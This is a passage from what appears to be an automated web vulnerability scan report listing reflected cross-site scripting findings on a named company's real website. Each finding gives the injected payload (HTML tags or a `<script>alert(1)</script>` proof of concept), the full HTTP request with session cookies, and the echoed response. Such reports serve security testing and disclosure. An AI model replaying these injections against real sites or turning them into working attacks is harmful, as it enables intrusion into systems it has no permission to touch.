Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/ferry-operator-software.html?2fc48"><a>0c9ee632b31=1#up">
...[SNIP]...

1.88. http://anite.com/handset-testing-office-locations.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/handset-testing-office-locations.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd796"><a>726b3d6aabf was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /handset-testing-office-locations.html?Itemid=484dd796"><a>726b3d6aabf HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:11:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:11:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/handset-testing-office-locations.html?Itemid=484dd796"><a>726b3d6aabf#up">
...[SNIP]...

1.89. http://anite.com/handset-testing-office-locations.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/handset-testing-office-locations.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b49e4"><script>alert(1)</script>70936cb45f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b49e4"><script>alert(1)</script>70936cb45f3 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:12:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:12:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/b49e4"><script>alert(1)</script>70936cb45f3#up">
...[SNIP]...

1.90. http://anite.com/handset-testing-office-locations.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/handset-testing-office-locations.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d33f5"><a>555c3f55be6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /handset-testing-office-locations.html?d33f5"><a>555c3f55be6=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:11:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:11:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/handset-testing-office-locations.html?d33f5"><a>555c3f55be6=1#up">
...[SNIP]...

1.91. http://anite.com/handset-testing-previous-news.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/handset-testing-previous-news.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcd0b"><script>alert(1)</script>1d51aa8d6f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dcd0b"><script>alert(1)</script>1d51aa8d6f3 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:18:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:18:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/dcd0b"><script>alert(1)</script>1d51aa8d6f3#up">
...[SNIP]...

1.92. http://anite.com/handset-testing-previous-news.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/handset-testing-previous-news.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74d44"><a>fb85a10303 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /handset-testing-previous-news.html?74d44"><a>fb85a10303=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:18:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:18:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/handset-testing-previous-news.html?74d44"><a>fb85a10303=1#up">
...[SNIP]...

1.93. http://anite.com/icera-and-anite-verify-lte-conformance-test-cases-with-iceras-lte-soft-modem.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/icera-and-anite-verify-lte-conformance-test-cases-with-iceras-lte-soft-modem.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6bd1"><a>9a976f9e8ae was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /icera-and-anite-verify-lte-conformance-test-cases-with-iceras-lte-soft-modem.html?Itemid=228a6bd1"><a>9a976f9e8ae&nomore=true HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmb=188041464; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/icera-and-anite-verify-lte-conformance-test-cases-with-iceras-lte-soft-modem.html?Itemid=228a6bd1"><a>9a976f9e8ae&nomore=true#up">
...[SNIP]...

1.94. http://anite.com/icera-and-anite-verify-lte-conformance-test-cases-with-iceras-lte-soft-modem.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/icera-and-anite-verify-lte-conformance-test-cases-with-iceras-lte-soft-modem.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6949"><script>alert(1)</script>89102cf02ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c6949"><script>alert(1)</script>89102cf02ef?Itemid=228&nomore=true HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmb=188041464; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="http://anite.com/c6949"><script>alert(1)</script>89102cf02ef?Itemid=228&nomore=true#up">
...[SNIP]...

1.95. http://anite.com/icera-and-anite-verify-lte-conformance-test-cases-with-iceras-lte-soft-modem.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/icera-and-anite-verify-lte-conformance-test-cases-with-iceras-lte-soft-modem.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bcd0"><a>32aa9c97d5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /icera-and-anite-verify-lte-conformance-test-cases-with-iceras-lte-soft-modem.html?Itemid=228&nomore=true&9bcd0"><a>32aa9c97d5d=1 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmb=188041464; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="http://anite.com/icera-and-anite-verify-lte-conformance-test-cases-with-iceras-lte-soft-modem.html?Itemid=228&nomore=true&9bcd0"><a>32aa9c97d5d=1#up">
...[SNIP]...

1.96. http://anite.com/index.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9452"><script>alert(1)</script>376f1f1784d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a9452"><script>alert(1)</script>376f1f1784d HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:17:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:17:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/a9452"><script>alert(1)</script>376f1f1784d#up">
...[SNIP]...

1.97. http://anite.com/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27439"><a>abe068a0b8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /index.php?27439"><a>abe068a0b8b=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 15:17:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:17:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34822

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/index.php?27439"><a>abe068a0b8b=1#up">
...[SNIP]...

1.98. http://anite.com/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 501f3"><script>alert(1)</script>403b3b10945 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php/501f3"><script>alert(1)</script>403b3b10945 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:17:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:17:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/index.php/501f3"><script>alert(1)</script>403b3b10945#up">
...[SNIP]...

1.99. http://anite.com/investors-advisers-3.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/investors-advisers-3.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b3ca"><a>f2714a3cd90 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /investors-advisers-3.html?Itemid=4639b3ca"><a>f2714a3cd90 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:15:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/investors-advisers-3.html?Itemid=4639b3ca"><a>f2714a3cd90#up">
...[SNIP]...

1.100. http://anite.com/investors-advisers-3.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/investors-advisers-3.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b04fa"><script>alert(1)</script>ac146adb616 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b04fa"><script>alert(1)</script>ac146adb616 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:15:50 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/b04fa"><script>alert(1)</script>ac146adb616#up">
...[SNIP]...

1.101. http://anite.com/investors-advisers-3.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/investors-advisers-3.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99a1b"><a>cb25781801b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /investors-advisers-3.html?99a1b"><a>cb25781801b=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:15:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/investors-advisers-3.html?99a1b"><a>cb25781801b=1#up">
...[SNIP]...

1.102. http://anite.com/investors-announcements.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/investors-announcements.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 962d0"><a>d993314eedd was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

